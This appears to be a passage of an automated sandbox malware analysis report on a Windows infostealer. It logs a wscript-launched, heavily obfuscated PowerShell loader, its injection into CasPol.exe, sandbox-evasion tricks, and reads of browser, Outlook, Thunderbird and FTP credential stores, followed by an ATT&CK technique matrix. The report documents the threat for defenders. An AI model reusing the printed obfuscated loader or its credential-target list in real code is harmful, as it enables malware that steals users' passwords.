        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
        Source: Initial fileInitial file: do while timer-temp<sec
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2344Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860Thread sleep count: 382 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860Thread sleep time: -11460000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dllJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8949
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 382
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleep
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
        Source: wscript.exe, 00000000.00000002.259228881.0000012BBB50F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20105110 LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skoleeksempel = """smadrdzodsy-cotblysapceech lo-untoryhapudefodmaesyfcaimhnnaiphtprifoopenpe uf'teuresblihensmgge tasskyopsqutueeanmbo;baudosfrialnorgje kasfjymissptvmedrmra.corbautunvatwaipamsaetr.viimanuntgieomrbaohuphysgoeimrapvtriomccleovsna;popafuchbkulduimocdo dasletanabutlyipocjo arcfelunaamshesno disudtnouspeinoburscgrelaseelrovsax1re ti{pr[sudwhlfolfeirimunpazosurpatst(en`"""aswopimaninsaspcaonoofolsg.redngrekvre`"""po)ho]frptruembselzeichcdj biskatglaprtimigeche paeobxfotreemirbrnca liiacnsutel enpderefifonbatmaefirafmscecostesadadigheemibpeoapxva(meisunretba skshytopahebrrlst,asibunbatsc sydsneadldeaungoptfo,pribinbitro skcunrpuobl,laitunhytla norfribevreuvalun,raironcatet eptmarfrobapkeiefcba,seirunmotll cosvakseibotfosreecr)bi;cy[rtdmulbalatilimlapfeorerimtin(ra`"""klaundeuvleaacpbaiaf3fr2pa.codanlhallg`"""tu)sp]repgrujubmulstioscoc masfatreauntraistckn reeprxpitdeeberennsi anigansgtaa snrinebrgerqgoubaeolrfrytridenclfchoenkwietryst(maistnfltmi nopspodutadtteehynsu,priprnsatfr ortskesolunereoarlde,akiinnbetfo coprelsaumerun,leiunnlatfl dyfsyufisefiimostnat,ouiioncuthe aasbeaillwa,baiponantrk kosgiaunuun,nyiginsrtbo stkloasnlreken,griarnmetdi hywtaetaeaf,odiemnfltir nugabohedgikko,siitonbrtim mesovymonhaabinro,veirenaatca brpagebyasj,vaihanphtgo nibbrinorgakpl)sa;su[andrelralmoisemhopyoopersntvi(re`"""dikwievorprnkoesmlqu3gl2os`"""un)sl]bopinugabkalamiflcfu rnsfetstaprtasicecov brezoxswtstereramnop stihancytph tedraudrprelsoihocknamutanemuhiraamnfodmilleesi(roispnbatop sphmijgaeun,unigunquttr crmloeakeavtesibenfl,reimonamtur hougonunounrsj,dyirantitfl kaemoxbeagecpr,ddiphnekttu baomavpiebrrbi,diitinmitrc udbfaidyooumsyepecdi,miibunxitop onsmiihulpausk)pr;kr[thdbalaflbaiinmfopdeororoptun(rh`"""mokfoesprprnexeamlad3he2op`"""ld)un]fepabufebskldeiincsn afsnetkeaeqtsaisucst saegrxdataneirrrenam neipenditdo fovfeiworbltceuopafllanainlbiluaosucel(moisunfatno prvde1ba,fditrnuntfo fival2tr,weispnsttka covfo3fo,osiganwitre savbe4ca)vi;ou[kadpalkrlfiianmscpvioxyrtitme(ax`"""maumeswietarek3di2kr`"""fa)ne]capleuwobmalydiincan bosextgrafrtciicocet opevaxentzuegnrkande alitinmaton usgfeenetvepovrklothpal(coifinfatbr uredegenyto,naitinbatls lesbehneati)as;ma[sidpllnelduicamvapsgoshrwatty(te`"""unujosdeecarco3sy2gu`"""fi)ur]skpstuanbhylheilycag smsmitsuatitodivacli boerwxtrtskeverunnno hyimonliteu blcthrovebraintfletjctiuopratstroiorpr(foidentitef glmiseunlunlfy,geitansotma korekrhalim,buisknertaw sufrilpoytagso,stiimnlatko acfbeaimsintsplbe,piiadnbrtpr crbreaagabenst1fo1pu1ha,hyistntytun stphasfoedaudi,shiennedtbg noqcouacaprkpieidrst)te;is[stdstlsulymichmmapafoudrpotta(bo`"""amadodbuvspaufpzoico3ba2bi`"""sh)va]sapunuaabgelhaibecun arssutjuaokthaioncpe coeprxictsretertinbi toilannutpo lysduehytarssbecorhivbiichcpresabmaifjtwesfr(snislnsater afgunaberre,nsipentytli hutudekonahogrndi,moitanfltte jodzoesesbapkr,maitrnsutsa gyeevxudpkl
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skoleeksempel = """smadrdzodsy-cotblysapceech lo-untoryhapudefodmaesyfcaimhnnaiphtprifoopenpe uf'teuresblihensmgge tasskyopsqutueeanmbo;baudosfrialnorgje kasfjymissptvmedrmra.corbautunvatwaipamsaetr.viimanuntgieomrbaohuphysgoeimrapvtriomccleovsna;popafuchbkulduimocdo dasletanabutlyipocjo arcfelunaamshesno disudtnouspeinoburscgrelaseelrovsax1re ti{pr[sudwhlfolfeirimunpazosurpatst(en`"""aswopimaninsaspcaonoofolsg.redngrekvre`"""po)ho]frptruembselzeichcdj biskatglaprtimigeche paeobxfotreemirbrnca liiacnsutel enpderefifonbatmaefirafmscecostesadadigheemibpeoapxva(meisunretba skshytopahebrrlst,asibunbatsc sydsneadldeaungoptfo,pribinbitro skcunrpuobl,laitunhytla norfribevreuvalun,raironcatet eptmarfrobapkeiefcba,seirunmotll cosvakseibotfosreecr)bi;cy[rtdmulbalatilimlapfeorerimtin(ra`"""klaundeuvleaacpbaiaf3fr2pa.codanlhallg`"""tu)sp]repgrujubmulstioscoc masfatreauntraistckn reeprxpitdeeberennsi anigansgtaa snrinebrgerqgoubaeolrfrytridenclfchoenkwietryst(maistnfltmi nopspodutadtteehynsu,priprnsatfr ortskesolunereoarlde,akiinnbetfo coprelsaumerun,leiunnlatfl dyfsyufisefiimostnat,ouiioncuthe aasbeaillwa,baiponantrk kosgiaunuun,nyiginsrtbo stkloasnlreken,griarnmetdi hywtaetaeaf,odiemnfltir nugabohedgikko,siitonbrtim mesovymonhaabinro,veirenaatca brpagebyasj,vaihanphtgo nibbrinorgakpl)sa;su[andrelralmoisemhopyoopersntvi(re`"""dikwievorprnkoesmlqu3gl2os`"""un)sl]bopinugabkalamiflcfu rnsfetstaprtasicecov brezoxswtstereramnop stihancytph tedraudrprelsoihocknamutanemuhiraamnfodmilleesi(roispnbatop sphmijgaeun,unigunquttr crmloeakeavtesibenfl,reimonamtur hougonunounrsj,dyirantitfl kaemoxbeagecpr,ddiphnekttu baomavpiebrrbi,diitinmitrc udbfaidyooumsyepecdi,miibunxitop onsmiihulpausk)pr;kr[thdbalaflbaiinmfopdeororoptun(rh`"""mokfoesprprnexeamlad3he2op`"""ld)un]fepabufebskldeiincsn afsnetkeaeqtsaisucst saegrxdataneirrrenam neipenditdo fovfeiworbltceuopafllanainlbiluaosucel(moisunfatno prvde1ba,fditrnuntfo fival2tr,weispnsttka covfo3fo,osiganwitre savbe4ca)vi;ou[kadpalkrlfiianmscpvioxyrtitme(ax`"""maumeswietarek3di2kr`"""fa)ne]capleuwobmalydiincan bosextgrafrtciicocet opevaxentzuegnrkande alitinmaton usgfeenetvepovrklothpal(coifinfatbr uredegenyto,naitinbatls lesbehneati)as;ma[sidpllnelduicamvapsgoshrwatty(te`"""unujosdeecarco3sy2gu`"""fi)ur]skpstuanbhylheilycag smsmitsuatitodivacli boerwxtrtskeverunnno hyimonliteu blcthrovebraintfletjctiuopratstroiorpr(foidentitef glmiseunlunlfy,geitansotma korekrhalim,buisknertaw sufrilpoytagso,stiimnlatko acfbeaimsintsplbe,piiadnbrtpr crbreaagabenst1fo1pu1ha,hyistntytun stphasfoedaudi,shiennedtbg noqcouacaprkpieidrst)te;is[stdstlsulymichmmapafoudrpotta(bo`"""amadodbuvspaufpzoico3ba2bi`"""sh)va]sapunuaabgelhaibecun arssutjuaokthaioncpe coeprxictsretertinbi toilannutpo lysduehytarssbecorhivbiichcpresabmaifjtwesfr(snislnsater afgunaberre,nsipentytli hutudekonahogrndi,moitanfltte jodzoesesbapkr,maitrnsutsa gyeevxudpkl
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: Yara matchFile source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_00EF44F2 bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_00EF44CD bind,
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        2
        OS Credential Dumping
        1
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Exfiltration Over Alternative Protocol
        2
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts421
        Scripting
        Boot or Logon Initialization Scripts1
        Access Token Manipulation
        1
        Deobfuscate/Decode Files or Information
        1
        Credentials in Registry
        115
        System Information Discovery
        Remote Desktop Protocol2
        Data from Local System
        Exfiltration Over Bluetooth11
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts21
        Command and Scripting Interpreter
        Logon Script (Windows)11
        Process Injection
        421
        Scripting
        Security Account Manager211
        Security Software Discovery
        SMB/Windows Admin Shares1
        Email Collection
        Automated Exfiltration1
        Non-Standard Port
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts1
        PowerShell
        Logon Script (Mac)Logon Script (Mac)2
        Obfuscated Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer2
        Non-Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets231
        Virtualization/Sandbox Evasion
        SSHKeyloggingData Transfer Size Limits23
        Application Layer Protocol
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items231
        Virtualization/Sandbox Evasion
        DCSync1
        Remote System Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem1
        System Network Configuration Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
        Process Injection
